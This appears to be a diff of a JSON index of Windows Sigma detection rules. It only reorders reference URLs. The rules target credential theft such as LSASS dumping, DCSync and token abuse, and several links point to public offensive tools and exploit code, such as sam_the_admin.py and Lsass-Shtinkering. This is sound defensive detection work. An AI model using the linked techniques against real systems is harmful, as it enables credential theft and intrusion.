"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" ], "tags": [ @@ -3396,8 +3396,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/D1rkMtr/UnhookingPatch", "https://twitter.com/D1rkMtr/status/1611471891193298944?s=20", + "https://github.com/D1rkMtr/UnhookingPatch", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_patchingapi.yml" ], "tags": [ @@ -3513,8 +3513,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://twitter.com/_xpn_/status/1491557187168178176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" ], "tags": [ 
@@ -3619,8 +3619,8 @@
 "logsource.category": "process_access",
 "logsource.product": "windows",
 "refs": [
- "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
 "https://twitter.com/SBousseaden/status/1541920424635912196",
+ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
 "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml"
 ],
@@ -3700,8 +3700,8 @@
 "logsource.category": "process_tampering",
 "logsource.product": "windows",
 "refs": [
- "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/",
 "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20",
+ "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml"
 ],
 "tags": [
@@ -3912,11 +3912,11 @@
 "logsource.category": "pipe_created",
 "logsource.product": "windows",
 "refs": [
- "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/",
+ "https://twitter.com/d4rksystem/status/1357010969264873472",
 "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
 "https://github.com/SigmaHQ/sigma/issues/253",
 "https://redcanary.com/threat-detection-report/threats/cobalt-strike/",
- "https://twitter.com/d4rksystem/status/1357010969264873472",
+ "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml"
 ],
 "tags": [
@@ -4227,18 +4227,18 @@
 "logsource.category": "pipe_created",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
 "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
- "https://www.us-cert.gov/ncas/alerts/TA17-117A",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a",
- "https://securelist.com/faq-the-projectsauron-apt/75533/",
- "https://github.com/RiccardoAncarani/LiquidSnake",
 "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
 "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
- "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
+ "https://securelist.com/faq-the-projectsauron-apt/75533/",
+ "https://github.com/RiccardoAncarani/LiquidSnake",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A",
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
 "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
 "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml"
 ],
 "tags": [
@@ -4298,9 +4298,9 @@
 "logsource.category": "pipe_created",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml",
- "https://github.com/Azure/SimuLand",
 "https://o365blog.com/post/adfs/",
+ "https://github.com/Azure/SimuLand",
+ "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml"
 ],
 "tags": [
@@ -4710,8 +4710,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
 "https://twitter.com/deviouspolack/status/832535435960209408",
+ "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml"
 ],
 "tags": [
@@ -4745,9 +4745,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore",
- "https://twitter.com/MsftSecIntel/status/1257324139515269121",
 "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
+ "https://twitter.com/MsftSecIntel/status/1257324139515269121",
+ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml"
 ],
 "tags": [
@@ -4840,8 +4840,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
 "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml"
 ],
 "tags": [
@@ -4922,8 +4922,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml"
 ],
 "tags": "No established tags"
@@ -5009,8 +5009,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml",
 "https://o365blog.com/post/hybridhealthagent/",
+ "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml"
 ],
 "tags": [
@@ -5228,10 +5228,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/sensepost/ruler/issues/47",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624",
- "https://github.com/sensepost/ruler",
 "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427",
+ "https://github.com/sensepost/ruler",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624",
+ "https://github.com/sensepost/ruler/issues/47",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml"
 ],
@@ -5309,8 +5309,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://awakesecurity.com/blog/threat-hunting-for-paexec/",
- "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
 "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf",
+ "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml"
 ],
 "tags": [
@@ -5463,9 +5463,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634",
- "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml"
 ],
 "tags": "No established tags"
@@ -5533,9 +5533,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events",
 "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/",
 "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis",
- "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml"
 ],
 "tags": [
@@ -5559,9 +5559,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete",
 "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm",
 "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
+ "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml"
 ],
 "tags": [
@@ -5692,8 +5692,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/",
 "https://twitter.com/SBousseaden/status/1207671369963646976",
+ "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml"
 ],
 "tags": [
@@ -5747,8 +5747,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1",
- "https://twitter.com/_dirkjan/status/1309214379003588608",
 "https://dirkjanm.io/a-different-way-of-abusing-zerologon/",
+ "https://twitter.com/_dirkjan/status/1309214379003588608",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml"
 ],
 "tags": [
@@ -5964,13 +5964,13 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729",
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728",
 "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633",
 "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_group_modification_logging.yml"
 ],
@@ -6041,8 +6041,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g",
 "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml",
+ "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml"
 ],
 "tags": [
@@ -6099,9 +6099,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961",
 "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/",
 "https://github.com/fox-it/LDAPFragger",
- "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml"
 ],
 "tags": [
@@ -6270,9 +6270,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d",
 "https://twitter.com/gentilkiwi/status/1003236624925413376",
 "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
- "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml"
 ],
 "tags": [
@@ -6410,8 +6410,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616",
- "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)",
 "Live environment caused by malware",
+ "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml"
 ],
 "tags": [
@@ -6775,8 +6775,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html",
 "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation",
+ "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml"
 ],
 "tags": [
@@ -6833,8 +6833,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/menasec1/status/1111556090137903104",
 "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf",
+ "https://twitter.com/menasec1/status/1111556090137903104",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml"
 ],
 "tags": [
@@ -7084,8 +7084,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649",
 "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml"
 ],
 "tags": "No established tags"
@@ -7107,9 +7107,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html",
- "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8",
- "https://twitter.com/Flangvik/status/1283054508084473861",
 "https://twitter.com/SecurityJosh/status/1283027365770276866",
+ "https://twitter.com/Flangvik/status/1283054508084473861",
+ "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml"
 ],
 "tags": [
@@ -7388,9 +7388,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml",
 "https://github.com/topotam/PetitPotam",
 "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/",
- "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml"
 ],
 "tags": [
@@ -7423,8 +7423,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673",
+ "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml"
 ],
 "tags": [
@@ -8160,10 +8160,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800",
- "https://www.cisecurity.org/controls/cis-controls-list/",
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml"
 ],
 "tags": "No established tags"
@@ -8213,16 +8213,16 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
- "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://bunnyinside.com/?term=f71e8cb9c76a",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
 "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
- "http://managed670.rssing.com/chan-5590147/all_p1.html",
- "https://twitter.com/_xpn_/status/1268712093928378368",
- "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
 "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
+ "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
+ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
+ "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "https://bunnyinside.com/?term=f71e8cb9c76a",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml"
 ],
 "tags": [
@@ -8350,8 +8350,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx",
 "https://twitter.com/SBousseaden/status/1096148422984384514",
+ "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml"
 ],
 "tags": [
@@ -8396,8 +8396,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml",
 "https://o365blog.com/post/hybridhealthagent/",
+ "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml"
 ],
 "tags": [
@@ -8454,8 +8454,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
 "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens",
+ "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml"
 ],
 "tags": [
@@ -8719,8 +8719,8 @@
 "logsource.product": "windows",
 "refs": [
 "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html",
- "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all",
 "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf",
+ "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml"
 ],
 "tags": [
@@ -8967,10 +8967,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/gentilkiwi/status/1003236624925413376",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662",
- "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
 "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r",
+ "https://twitter.com/gentilkiwi/status/1003236624925413376",
+ "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml"
 ],
 "tags": [
@@ -9089,8 +9089,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html",
 "https://twitter.com/SBousseaden/status/1490608838701166596",
+ "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml"
 ],
 "tags": [
@@ -9156,8 +9156,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py",
 "https://twitter.com/malmoeb/status/1511760068743766026",
+ "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py",
 "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml"
 ],
@@ -9349,8 +9349,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/JohnLaTwC/status/1004895028995477505",
 "https://goo.gl/PsqrhT",
+ "https://twitter.com/JohnLaTwC/status/1004895028995477505",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml"
 ],
 "tags": [
@@ -9630,8 +9630,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed",
 "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31",
+ "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed",
 "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml"
 ],
@@ -9665,8 +9665,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16",
 "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml"
 ],
 "tags": [
@@ -9745,8 +9745,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://technet.microsoft.com/en-us/library/security/4022344",
 "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
+ "https://technet.microsoft.com/en-us/library/security/4022344",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml"
 ],
 "tags": [
@@ -9805,9 +9805,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55",
- "https://github.com/deepinstinct/Lsass-Shtinkering",
 "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
+ "https://github.com/deepinstinct/Lsass-Shtinkering",
+ "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml"
 ],
 "tags": [
@@ -9840,11 +9840,11 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/DidierStevens/status/1217533958096924676",
- "https://nullsec.us/windows-event-log-audit-cve/",
